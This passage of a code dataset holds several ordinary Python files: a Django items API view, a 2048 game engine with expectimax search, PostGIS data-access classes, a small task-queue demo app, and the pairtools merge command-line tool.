of all items for the specified category.\n \"\"\"\n model = Item\n serializer_class = ItemSerializer\n\n def get_queryset(self):\n \"\"\"\n Get the items for this category\n \"\"\"\n # make sure there's a category query param\n if 'category' not in self.request.GET:\n raise Http404\n\n # Look up the categtory\n category = Category.objects.filter(name=self.request.GET['category'].capitalize())\n\n # make sure it's legit\n if category:\n\n # save the cateogory for the request\n items = Item.objects.filter(category=category)\n\n return items\n\n raise Http404\n\n# def items(request):\n# \"\"\"\n# Retrieve a list of items from the server, keyed to the category query param\n# \"\"\"\n# # make sure there's a category query param\n# if 'category' not in request.GET:\n# raise Http404\n\n# # save the cateogory for the request\n# key = request.GET['category']\n\n# data = {\n# \"items\": [\n# {\n# \"id\": 1,\n# \"name\": \"ember-infinite-scroll\",\n# \"description\": \"An example of infinite scrolling using ember\",\n# \"url\": 'http://jsbin.com/famer/1',\n# \"repository\": 'https://github.com/bantic/ember-infinite-scroll',\n# },\n# {\n# \"id\": 2,\n# \"name\": \"oblivion\",\n# \"description\": \"An example of oblivion\",\n# \"url\": 'https://github.com',\n# \"repository\": 'https://github.com/commadelimited/extras',\n# },\n# ]\n# }\n# return JSONResponse(data)\n", "sub_path": "extras/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2634, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.http.HttpResponse", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.renderers.JSONRenderer", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 27, "usage_type": "name"}, {"api_name": "extras.models.Category", "line_number": 31, "usage_type": "name"}, {"api_name": "extras.api.serializers.CategorySerializer", "line_number": 32, "usage_type": "name"}, {"api_name": "extras.models.Category.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "extras.models.Category.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "extras.models.Category", "line_number": 38, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 43, "usage_type": "name"}, {"api_name": "extras.models.Item", "line_number": 47, "usage_type": "name"}, {"api_name": "extras.api.serializers.ItemSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 56, "usage_type": "name"}, {"api_name": "extras.models.Category.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "extras.models.Category.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "extras.models.Category", "line_number": 59, "usage_type": "name"}, {"api_name": "extras.models.Item.objects.filter", "line_number": 65, "usage_type": "call"}, {"api_name": "extras.models.Item.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "extras.models.Item", "line_number": 65, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "257033124", "text": "import copy\nimport itertools\nimport math\nimport random\n\nimport ai\n\nMAX_DEPTH = 3\n\n\ndef merge_left(b):\n # merge the board left\n # this function is reused in the other merges\n # b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n def merge(row, acc):\n # recursive helper for merge_left\n # if len row == 0, return accumulator\n if not row:\n return acc\n\n # x = first element\n x = row[0]\n # if len(row) == 1, add element to accu\n if len(row) == 1:\n return acc + [x]\n # if len(row) >= 2\n if x == row[1]:\n # add row[0] + row[1] to accu, continue with row[2:]\n return merge(row[2:], acc + [2 * x])\n else:\n # add row[0] to accu, continue with row[1:]\n return merge(row[1:], acc + [x])\n\n new_b = []\n for row in b:\n # merge row, skip the [0]'s\n merged = merge([x for x in row if x != 0], [])\n # add [0]'s to the right if necessary\n merged = merged + [0] * (len(row) - len(merged))\n new_b.append(merged)\n # return [[2, 8, 0, 0], [2, 4, 8, 0], [4, 0, 0, 0], [4, 4, 0, 0]]\n return new_b\n\n\ndef merge_right(b):\n # merge the board right\n # b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n def reverse(x):\n return list(reversed(x))\n\n # rev = [[4, 4, 2, 0], [8, 4, 2, 0], [4, 0, 0, 0], [2, 2, 2, 2]]\n rev = [reverse(x) for x in b]\n # ml = [[8, 2, 0, 0], [8, 4, 2, 0], [4, 0, 0, 0], [4, 4, 0, 0]]\n ml = merge_left(rev)\n # return [[0, 0, 2, 8], [0, 2, 4, 8], [0, 0, 0, 4], [0, 0, 4, 4]]\n return [reverse(x) for x in ml]\n\n\ndef merge_up(b):\n # merge the board upward\n # note that zip(*b) is the transpose of b\n # b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n # trans = [[2, 0, 0, 0], [4, 2, 0, 0], [8, 2, 0, 0], [4, 8, 4, 2]]\n trans = merge_left(zip(*b))\n # return [[2, 4, 8, 4], [0, 2, 2, 8], [0, 0, 0, 4], [0, 0, 0, 2]]\n return [list(x) for x in zip(*trans)]\n\n\ndef merge_down(b):\n # merge the board downward\n trans = merge_right(zip(*b))\n # return [[0, 0, 0, 4], [0, 0, 0, 8], [0, 2, 8, 4], [2, 4, 2, 2]]\n return [list(x) for x in zip(*trans)]\n\n\n# location: after functions\nMERGE_FUNCTIONS = {\n 'left': merge_left,\n 'right': merge_right,\n 'up': merge_up,\n 'down': merge_down\n}\n\n\ndef move_exists(b):\n # check whether or not a move exists on the board\n # b = [[1, 2, 3, 4], [5, 6, 7, 8]]\n # move_exists(b) return False\n def inner(b):\n for row in b:\n for x, y in zip(row[:-1], row[1:]):\n # tuples (1, 2),(2, 3),(3, 4),(5, 6),(6, 7),(7, 8)\n # if same value or an empty cell\n if x == y or x == 0 or y == 0:\n return True\n return False\n\n # check horizontally and vertically\n if inner(b) or inner(zip(*b)):\n return True\n else:\n return False\n\n\ndef start():\n # make initial board\n b = [[0] * 4 for _ in range(4)]\n add_two_four(b)\n add_two_four(b)\n return b\n\n\ndef play_move(b, direction):\n # get merge functin an apply it to board\n b = MERGE_FUNCTIONS[direction](b)\n add_two_four(b)\n return b\n\n\ndef add_two_four(b):\n # add a random tile to the board at open position.\n # chance of placing a 2 is 90%; chance of 4 is 10%\n rows, cols = list(range(4)), list(range(4))\n random.shuffle(rows)\n random.shuffle(cols)\n distribution = [2] * 9 + [4]\n for i, j in itertools.product(rows, cols):\n if b[i][j] == 0:\n b[i][j] = random.sample(distribution, 1)[0]\n return (b)\n else:\n continue\n\n\ndef game_state(b):\n for i in range(4):\n for j in range(4):\n if b[i][j] >= 2048:\n return 'win'\n return 'lose'\n\n\ndef test():\n b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n assert merge_left(b) == [[2, 8, 0, 0], [2, 4, 8, 0], [\n 4, 0, 0, 0], [4, 4, 0, 0]]\n assert merge_right(b) == [[0, 0, 2, 8], [0, 2, 4, 8], [\n 0, 0, 0, 4], [0, 0, 4, 4]]\n assert merge_up(b) == [[2, 4, 8, 4], [0, 2, 2, 8],\n [0, 0, 0, 4], [0, 0, 0, 2]]\n assert merge_down(b) == [[0, 0, 0, 4], [0, 0, 0, 8], [\n 0, 2, 8, 4], [2, 4, 2, 2]]\n assert move_exists(b) == True\n b = [[2, 8, 4, 0], [16, 0, 0, 0], [2, 0, 2, 0], [2, 0, 0, 0]]\n assert (merge_left(b)) == [[2, 8, 4, 0], [\n 16, 0, 0, 0], [4, 0, 0, 0], [2, 0, 0, 0]]\n assert (merge_right(b)) == [[0, 2, 8, 4], [\n 0, 0, 0, 16], [0, 0, 0, 4], [0, 0, 0, 2]]\n assert (merge_up(b)) == [[2, 8, 4, 0], [\n 16, 0, 2, 0], [4, 0, 0, 0], [0, 0, 0, 0]]\n assert (merge_down(b)) == [[0, 0, 0, 0], [\n 2, 0, 0, 0], [16, 0, 4, 0], [4, 8, 2, 0]]\n assert (move_exists(b)) == True\n b = [[32, 64, 2, 16], [8, 32, 16, 2], [4, 16, 8, 4], [2, 8, 4, 2]]\n assert (move_exists(b)) == False\n b = [[0, 7, 0, 0], [0, 0, 7, 7], [0, 0, 0, 7], [0, 7, 0, 0]]\n for i in range(11):\n add_two_four(b)\n print(b)\n\n\ndef get_random_move():\n return random.choice(list(MERGE_FUNCTIONS.keys()))\n\n\ndef possible_boards(b):\n # Returns a list of tuples with the boards and their chance of happening.\n boards, n = [], len(b)\n\n # Retrieve the number of empty spaces.\n empty = ai.empty(b)\n\n for i in range(n):\n for j in range(n):\n\n # Check whether the cell is empty.\n if b[i][j] == 0:\n\n # Copy the board and set the value to 2.\n board = copy.deepcopy(b)\n board[i][j] = 2\n\n # Add the board and it's chance of occuring.\n boards.append((0.9 * (100 / empty), board))\n\n # Copy the board and set the value to 4.\n board = copy.deepcopy(b)\n board[i][j] = 4\n\n # Add the board and it's chance of occuring.\n boards.append((0.1 * (100 / empty), board))\n\n return boards\n\n\ndef get_expectimax_move(b):\n # Determine the best move using expectimax.\n best_dir, best_score = 0, -math.inf\n\n for dir in MERGE_FUNCTIONS.keys():\n board = play_move(copy.deepcopy(b), dir)\n\n # Determine the depth based on the number of empty spaces.\n depth = 5 if ai.empty(board) < 6 else 3\n\n # Calculate the expectimax score.\n expectimax_score = expectimax(board, depth, False)\n\n if expectimax_score > best_score:\n best_dir, best_score = dir, expectimax_score\n\n return best_dir\n\n\ndef is_terminal(b):\n # Check whether the board is the terminal board state.\n return not move_exists(b)\n\n\ndef expectimax(board, depth, is_max):\n # Calculate the best move using the expectimax algorithm.\n if depth == 0 or is_terminal(board):\n return ai.heuristic(board)\n\n if is_max:\n value = -math.inf\n\n for dir in MERGE_FUNCTIONS.keys():\n # Create the new board.\n temp_board = play_move(copy.deepcopy(board), dir)\n score = expectimax(temp_board, depth - 1, False)\n value = max(score, value)\n\n return value\n\n else:\n value = 0\n\n for val in possible_boards(board):\n # Create the new board.\n score = (val[0] * expectimax(val[1], depth - 1, True))\n value += score\n\n return value\n", "sub_path": "artificial-intelligence/2048/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 7354, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.shuffle", "line_number": 124, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 125, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 127, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 129, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 173, "usage_type": "call"}, {"api_name": "ai.empty", "line_number": 181, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 190, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 197, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 208, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 211, "usage_type": "call"}, {"api_name": "ai.empty", "line_number": 214, "usage_type": "call"}, {"api_name": "ai.heuristic", "line_number": 233, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 236, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "493222294", "text": "from __future__ import absolute_import, division, print_function\nfrom builtins import (\n bytes, str, open, super, range, zip, round, input, int, pow, object\n)\n\nfrom sqlalchemy import create_engine, MetaData, Table, text\nfrom geoalchemy2 import Geometry\nimport fiona\nimport geopandas\ntry:\n import osr\nexcept ImportError:\n from osgeo import osr\n\nfrom gaia.filters import filter_postgis\nfrom gaia.geo.gdal_functions import gdal_reproject\nfrom gaia.util import GaiaException, sqlengines\n\n\nclass GaiaDataObject(object):\n def __init__(self, reader=None, dataFormat=None, epsg=None, **kwargs):\n self._data = None\n self._metadata = None\n self._reader = reader\n self._datatype = None\n self._dataformat = dataFormat\n self._epsg = epsg\n\n def get_metadata(self):\n if not self._metadata:\n self._reader.load_metadata(self)\n return self._metadata\n\n def set_metadata(self, metadata):\n self._metadata = metadata\n\n def get_data(self):\n if self._data is None:\n self._reader.load_data(self)\n return self._data\n\n def set_data(self, data):\n self._data = data\n\n def get_epsg(self):\n return self._epsg\n\n def reproject(self, epsg):\n repro = geopandas.GeoDataFrame.copy(self.get_data())\n repro[repro.geometry.name] = repro.geometry.to_crs(epsg=epsg)\n repro.crs = fiona.crs.from_epsg(epsg)\n self._data = repro\n self._epsg = epsg\n\n # Recompute bounds\n geometry = repro['geometry']\n geopandas_bounds = geometry.total_bounds\n xmin, ymin, xmax, ymax = geopandas_bounds\n coords = [[\n [xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]\n ]]\n metadata = self.get_metadata()\n bounds = metadata.get('bounds', {})\n bounds['coordinates'] = coords\n metadata['bounds'] = bounds\n self.set_metadata(metadata)\n\n def _getdatatype(self):\n if not self._datatype:\n self.get_metadata()\n if not self._datatype:\n self._datatype = self._metadata.get('type_', 'unknown')\n\n return self._datatype\n\n def _setdatatype(self, value):\n self._datatype = value\n\n datatype = property(_getdatatype, _setdatatype)\n\n def _getdataformat(self):\n if not self._dataformat:\n self.get_metadata()\n\n return self._dataformat\n\n def _setdataformat(self, value):\n self._dataformat = value\n\n dataformat = property(_getdataformat, _setdataformat)\n\n\nclass GDALDataObject(GaiaDataObject):\n def __init__(self, reader=None, **kwargs):\n super(GDALDataObject, self).__init__(**kwargs)\n self._reader = reader\n self._epsgComputed = False\n\n def get_epsg(self):\n if not self._epsgComputed:\n if not self._data:\n self.get_data()\n\n projection = self._data.GetProjection()\n data_crs = osr.SpatialReference(wkt=projection)\n\n try:\n self.epsg = int(data_crs.GetAttrValue('AUTHORITY', 1))\n self._epsgComputed = True\n except KeyError:\n raise GaiaException(\"EPSG code coud not be determined\")\n\n return self.epsg\n\n def reproject(self, epsg):\n self._data = gdal_reproject(self._data, '', epsg=epsg)\n self.epsg = epsg\n\n\nclass PostgisDataObject(GaiaDataObject):\n def __init__(self, reader=None, **kwargs):\n super(PostgisDataObject, self).__init__(**kwargs)\n\n self._reader = reader\n\n self._table = None\n self._hostname = None\n self._dbname = None\n self._user = None\n self._password = None\n self._columns = []\n self._filters = None\n self._geom_column = 'the_geom'\n self._epsg = None\n self._meta = None\n self._table_obj = None\n\n # Define table property\n def _settable(self, table):\n self._table = table\n\n def _gettable(self):\n return self._table\n\n table = property(_gettable, _settable)\n\n # Define hostname property\n def _sethostname(self, hostname):\n self._hostname = hostname\n\n def _gethostname(self):\n return self._hostname\n\n hostname = property(_gethostname, _sethostname)\n\n # Define db property\n def _setdbname(self, dbname):\n self._dbname = dbname\n\n def _getdbname(self):\n return self._dbname\n\n dbname = property(_getdbname, _setdbname)\n\n # Define user property\n def _setuser(self, user):\n self._user = user\n\n def _getuser(self):\n return self._user\n\n user = property(_getuser, _setuser)\n\n # Define password property\n def _setpassword(self, password):\n self._password = password\n\n def _getpassword(self):\n return self._password\n\n password = property(_getpassword, _setpassword)\n\n # Define epsg property\n def _setepsg(self, epsg):\n self._epsg = epsg\n\n def _getepsg(self):\n return self._epsg\n\n epsg = property(_getepsg, _setepsg)\n\n # Define filters property\n def _setfilters(self, filters):\n self._filters = filters\n\n def _getfilters(self):\n return self._filters\n\n filters = property(_getfilters, _setfilters)\n\n # Define geom_column property\n def _setgeom_column(self, geom_column):\n self._geom_column = geom_column\n\n def _getgeom_column(self):\n return self._geom_column\n\n geom_column = property(_getgeom_column, _setgeom_column)\n\n # Define engine property\n def _setengine(self, engine):\n self._engine = engine\n\n def _getengine(self):\n return self._engine\n\n engine = property(_getengine, _setengine)\n\n # etc...\n\n def initialize_engine(self):\n self._engine = self.get_engine(self.get_connection_string())\n\n self.get_table_info()\n self.verify()\n\n # methods additional in PostgisIO\n\n def get_engine(self, connection_string):\n \"\"\"\n Create and return a SQLAlchemy engine object\n\n :param connection_string: Database connection string\n :return: SQLAlchemy Engine object\n \"\"\"\n if connection_string not in sqlengines:\n sqlengines[connection_string] = create_engine(\n self.get_connection_string())\n return sqlengines[connection_string]\n\n def verify(self):\n \"\"\"\n Make sure that all PostgisIO columns exist in the actual table\n \"\"\"\n for col in self._columns:\n if col not in self._table_obj.columns.keys():\n raise GaiaException('{} column not found in {}'.format(\n col, self._table_obj))\n\n def get_connection_string(self):\n \"\"\"\n Get connection string based on host, dbname, username, password\n\n :return: Postgres connection string for SQLAlchemy\n \"\"\"\n auth = ''\n if self._user:\n auth = self._user\n if self._password:\n auth = auth + ':' + self._password\n if auth:\n auth += '@'\n conn_string = 'postgresql://{auth}{host}/{dbname}'.format(\n auth=auth, host=self._hostname, dbname=self._dbname)\n\n return conn_string\n\n def get_epsg(self):\n \"\"\"\n Get the EPSG code of the data\n\n :return: EPSG code\n \"\"\"\n return self._epsg\n\n def get_table_info(self):\n \"\"\"\n Use SQLALchemy reflection to gather data on the table, including the\n geometry column, geometry type, and EPSG code, and assign to the\n PostgisIO object's attributes.\n \"\"\"\n epsg = None\n meta = MetaData()\n table_obj = Table(self._table, meta,\n autoload=True, autoload_with=self._engine)\n if not self._columns:\n self._columns = table_obj.columns.keys()\n geo_cols = [(col.name, col.type) for col in table_obj.columns\n if hasattr(col.type, 'srid')]\n if geo_cols:\n geo_col = geo_cols[0]\n self._geom_column = geo_col[0]\n geo_obj = geo_col[1]\n if self._geom_column not in self._columns:\n self._columns.append(self._geom_column)\n if hasattr(geo_obj, 'srid'):\n epsg = geo_obj.srid\n if epsg == -1:\n epsg = 4326\n if hasattr(geo_obj, 'geometry_type'):\n self._geometry_type = geo_obj.geometry_type\n\n self._epsg = epsg\n self._table_obj = table_obj\n self._meta = meta\n\n def get_geometry_type(self):\n \"\"\"\n Get the geometry type of the data\n\n :return: Geometry type\n \"\"\"\n return self._geometry_type\n\n def get_query(self):\n \"\"\"\n Formulate a query string and parameter list based on the\n table name, columns, and filter\n\n :return: Query string\n \"\"\"\n columns = ','.join(['\"{}\"'.format(x) for x in self._columns])\n query = 'SELECT {} FROM \"{}\"'.format(columns, self._table)\n filter_params = []\n if self._filters:\n filter_sql, filter_params = filter_postgis(self._filters)\n query += ' WHERE {}'.format(filter_sql)\n query += ';'\n return str(text(query)), filter_params\n", "sub_path": "gaia/gaia_data.py", "file_name": "gaia_data.py", "file_ext": "py", "file_size_in_byte": 9236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "builtins.object", "line_number": 20, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame.copy", "line_number": 49, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 49, "usage_type": "attribute"}, {"api_name": "fiona.crs.from_epsg", "line_number": 51, "usage_type": "call"}, {"api_name": "fiona.crs", "line_number": 51, "usage_type": "attribute"}, {"api_name": "builtins.super", "line_number": 95, "usage_type": "call"}, {"api_name": "osgeo.osr.SpatialReference", "line_number": 105, "usage_type": "call"}, {"api_name": "osgeo.osr", "line_number": 105, "usage_type": "name"}, {"api_name": "builtins.int", "line_number": 108, "usage_type": "call"}, {"api_name": "gaia.util.GaiaException", "line_number": 111, "usage_type": "call"}, {"api_name": "gaia.geo.gdal_functions.gdal_reproject", "line_number": 116, "usage_type": "call"}, {"api_name": "builtins.super", "line_number": 122, "usage_type": "call"}, {"api_name": "gaia.util.sqlengines", "line_number": 236, "usage_type": "name"}, {"api_name": "gaia.util.sqlengines", "line_number": 237, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 237, "usage_type": "call"}, {"api_name": "gaia.util.sqlengines", "line_number": 239, "usage_type": "name"}, {"api_name": "gaia.util.GaiaException", "line_number": 247, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 283, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 284, "usage_type": "call"}, {"api_name": "gaia.filters.filter_postgis", "line_number": 326, "usage_type": "call"}, {"api_name": "builtins.str", "line_number": 329, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 329, "usage_type": "call"}]} +{"seq_id": "14363433", "text": "from django.conf.urls import url\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.db import models\n\nfrom django_leek.api import Leek, push_task_to_queue\n\nleek = Leek()\n\n\nclass Person(models.Model):\n name = models.CharField(max_length=30)\n\n\n@leek.task\ndef hello(to):\n person = Person.objects.create(name=\"to\")\n person.save()\n\n print('Hello {}!'.format(to))\n\n\ndef index(request):\n if 'queue' in request.GET:\n # Run sync\n hello(to='sync')\n \n # Run async\n hello.offload(to='kwargs')\n hello.offload('args')\n\n push_task_to_queue(hello, to='old')\n return render(request, 'index.html', {'message': '✓ task queued'})\n\n return render(request, 'index.html')\n\n\nurlpatterns = [\n url(r'^$', index),\n]\n", "sub_path": "test_app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 802, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django_leek.api.Leek", "line_number": 8, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django_leek.api.push_task_to_queue", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "372404318", "text": "#!/usr/bin/env python\nimport sys\nimport glob\nimport math\nimport subprocess\nimport click\n\nfrom ..lib import fileio, pairsam_format, headerops\nfrom . import cli, common_io_options\n\nUTIL_NAME = \"pairtools_merge\"\n\n\n@cli.command()\n@click.argument(\n \"pairs_path\",\n nargs=-1,\n type=str,\n)\n@click.option(\n \"-o\",\n \"--output\",\n type=str,\n default=\"\",\n help=\"output file.\"\n \" If the path ends with .gz/.lz4, the output is compressed by bgzip/lz4c.\"\n \" By default, the output is printed into stdout.\",\n)\n@click.option(\n \"--max-nmerge\",\n type=int,\n default=8,\n show_default=True,\n help=\"The maximal number of inputs merged at once. For more, store \"\n \"merged intermediates in temporary files.\",\n)\n@click.option(\n \"--tmpdir\",\n type=str,\n default=\"\",\n help=\"Custom temporary folder for merged intermediates.\",\n)\n@click.option(\n \"--memory\",\n type=str,\n default=\"2G\",\n show_default=True,\n help=\"The amount of memory used by default.\",\n)\n@click.option(\n \"--compress-program\",\n type=str,\n default=\"\",\n show_default=True,\n help=\"A binary to compress temporary merged chunks. \"\n \"Must decompress input when the flag -d is provided. \"\n \"Suggested alternatives: lz4c, gzip, lzop, snzip. \"\n \"NOTE: fails silently if the command syntax is wrong. \",\n)\n@click.option(\n \"--nproc\",\n type=int,\n default=8,\n help=\"Number of threads for merging.\",\n show_default=True,\n)\n@click.option(\n \"--nproc-in\",\n type=int,\n default=1,\n show_default=True,\n help=\"Number of processes used by the auto-guessed input decompressing command.\",\n)\n@click.option(\n \"--nproc-out\",\n type=int,\n default=8,\n show_default=True,\n help=\"Number of processes used by the auto-guessed output compressing command.\",\n)\n@click.option(\n \"--cmd-in\",\n type=str,\n default=None,\n help=\"A command to decompress the input. \"\n \"If provided, fully overrides the auto-guessed command. \"\n \"Does not work with stdin. \"\n \"Must read input from stdin and print output into stdout. \"\n \"EXAMPLE: pbgzip -dc -n 3\",\n)\n@click.option(\n \"--cmd-out\",\n type=str,\n default=None,\n help=\"A command to compress the output. \"\n \"If provided, fully overrides the auto-guessed command. \"\n \"Does not work with stdout. \"\n \"Must read input from stdin and print output into stdout. \"\n \"EXAMPLE: pbgzip -c -n 8\",\n)\n@click.option(\n \"--keep-first-header/--no-keep-first-header\",\n default=False,\n show_default=True,\n help=\"Keep the first header or merge the headers together. Default: merge headers.\",\n)\n@click.option(\n \"--concatenate/--no-concatenate\",\n default=False,\n show_default=True,\n help=\"Simple concatenate instead of merging sorted files.\",\n)\n# Using custom IO options\n\n\ndef merge(\n pairs_path, output, max_nmerge, tmpdir, memory, compress_program, nproc, **kwargs\n):\n \"\"\"Merge .pairs/.pairsam files.\n By default, assumes that the files are sorted and maintains the sorting.\n\n Merge triu-flipped sorted pairs/pairsam files. If present, the @SQ records\n of the SAM header must be identical; the sorting order of\n these lines is taken from the first file in the list.\n The ID fields of the @PG records of the SAM header are modified with a\n numeric suffix to produce unique records.\n The other unique SAM and non-SAM header lines are copied into the output header.\n\n PAIRS_PATH : upper-triangular flipped sorted .pairs/.pairsam files to merge\n or a group/groups of .pairs/.pairsam files specified by a wildcard. For\n paths ending in .gz/.lz4, the files are decompressed by bgzip/lz4c.\n\n \"\"\"\n merge_py(\n pairs_path,\n output,\n max_nmerge,\n tmpdir,\n memory,\n compress_program,\n nproc,\n **kwargs,\n )\n\n\ndef merge_py(\n pairs_path, output, max_nmerge, tmpdir, memory, compress_program, nproc, **kwargs\n):\n paths = sum([glob.glob(mask) for mask in pairs_path], [])\n\n if len(paths) == 0:\n raise ValueError(f\"No input paths: {pairs_path}\")\n\n outstream = fileio.auto_open(\n output,\n mode=\"w\",\n nproc=kwargs.get(\"nproc_out\"),\n command=kwargs.get(\"cmd_out\", None),\n )\n\n # if there is only one input, bypass merging and do not modify the header\n if len(paths) == 1:\n instream = fileio.auto_open(\n paths[0],\n mode=\"r\",\n nproc=kwargs.get(\"nproc_in\"),\n command=kwargs.get(\"cmd_in\", None),\n )\n for line in instream:\n outstream.write(line)\n if outstream != sys.stdout:\n outstream.close()\n\n return\n\n headers = []\n for path in paths:\n f = fileio.auto_open(\n path,\n mode=\"r\",\n nproc=kwargs.get(\"nproc_in\"),\n command=kwargs.get(\"cmd_in\", None),\n )\n h, _ = headerops.get_header(f)\n headers.append(h)\n f.close()\n # Skip other headers if keep_first_header is True (False by default):\n if kwargs.get(\"keep_first_header\", False):\n break\n\n if not headerops.all_same_columns(headers):\n raise ValueError(\"Input pairs cannot contain different columns\")\n\n merged_header = headerops.merge_headers(headers)\n merged_header = headerops.append_new_pg(merged_header, ID=UTIL_NAME, PN=UTIL_NAME)\n\n outstream.writelines((l + \"\\n\" for l in merged_header))\n outstream.flush()\n\n # If concatenation requested instead of merging sorted input:\n if kwargs.get(\"concatenate\", False):\n command = r\"\"\"\n /bin/bash -c 'export LC_COLLATE=C; export LANG=C; cat \"\"\"\n # Full merge that keeps the ordered input:\n else:\n command = r\"\"\"\n /bin/bash -c 'export LC_COLLATE=C; export LANG=C; sort\n -k {0},{0} -k {1},{1} -k {2},{2}n -k {3},{3}n -k {4},{4} \n --merge \n --field-separator=$'\\''{5}'\\''\n {6}\n {7}\n {8}\n -S {9}\n {10}\n \"\"\".replace(\n \"\\n\", \" \"\n ).format(\n pairsam_format.COL_C1 + 1,\n pairsam_format.COL_C2 + 1,\n pairsam_format.COL_P1 + 1,\n pairsam_format.COL_P2 + 1,\n pairsam_format.COL_PTYPE + 1,\n pairsam_format.PAIRSAM_SEP_ESCAPE,\n \" --parallel={} \".format(nproc) if nproc > 1 else \" \",\n \" --batch-size={} \".format(max_nmerge) if max_nmerge else \" \",\n \" --temporary-directory={} \".format(tmpdir) if tmpdir else \" \",\n memory,\n (\n \" --compress-program={} \".format(compress_program)\n if compress_program\n else \" \"\n ),\n )\n for path in paths:\n if kwargs.get(\"cmd_in\", None):\n command += r\"\"\" <(cat {} | {} | sed -n -e '\\''/^[^#]/,$p'\\'')\"\"\".format(\n path, kwargs[\"cmd_in\"]\n )\n elif path.endswith(\".gz\"):\n command += (\n r\"\"\" <(bgzip -dc -@ {} {} | sed -n -e '\\''/^[^#]/,$p'\\'')\"\"\".format(\n kwargs[\"nproc_in\"], path\n )\n )\n elif path.endswith(\".lz4\"):\n command += r\"\"\" <(lz4c -dc {} | sed -n -e '\\''/^[^#]/,$p'\\'')\"\"\".format(\n path\n )\n else:\n command += r\"\"\" <(sed -n -e '\\''/^[^#]/,$p'\\'' {})\"\"\".format(path)\n command += \"'\"\n\n subprocess.check_call(command, shell=True, stdout=outstream)\n\n if outstream != sys.stdout:\n outstream.close()\n\n\nif __name__ == \"__main__\":\n merge()\n", "sub_path": "pairtools/cli/merge.py", "file_name": "merge.py", "file_ext": "py", "file_size_in_byte": 7587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "click.argument", "line_number": 15, "usage_type": "call"}, {"api_name": "click.option", "line_number": 20, "usage_type": "call"}, {"api_name": "click.option", "line_number": 29, "usage_type": "call"}, {"api_name": "click.option", "line_number": 37, "usage_type": "call"}, {"api_name": "click.option", "line_number": 43, "usage_type": "call"}, {"api_name": "click.option", "line_number": 50, "usage_type": "call"}, {"api_name": "click.option", "line_number": 60, "usage_type": "call"}, {"api_name": "click.option", "line_number": 67, "usage_type": "call"}, {"api_name": "click.option", "line_number": 74, "usage_type": "call"}, {"api_name": "click.option", "line_number": 81, "usage_type": "call"}, {"api_name": "click.option", "line_number": 91, "usage_type": "call"}, {"api_name": "click.option", "line_number": 101, "usage_type": "call"}, {"api_name": "click.option", "line_number": 107, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 149, "usage_type": "call"}, {"api_name": "lib.fileio.auto_open", "line_number": 154, "usage_type": "call"}, {"api_name": "lib.fileio", "line_number": 154, "usage_type": "name"}, {"api_name": "lib.fileio.auto_open", "line_number": 163, "usage_type": "call"}, {"api_name": "lib.fileio", "line_number": 163, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 171, "usage_type": "attribute"}, {"api_name": "lib.fileio.auto_open", "line_number": 178, "usage_type": "call"}, {"api_name": 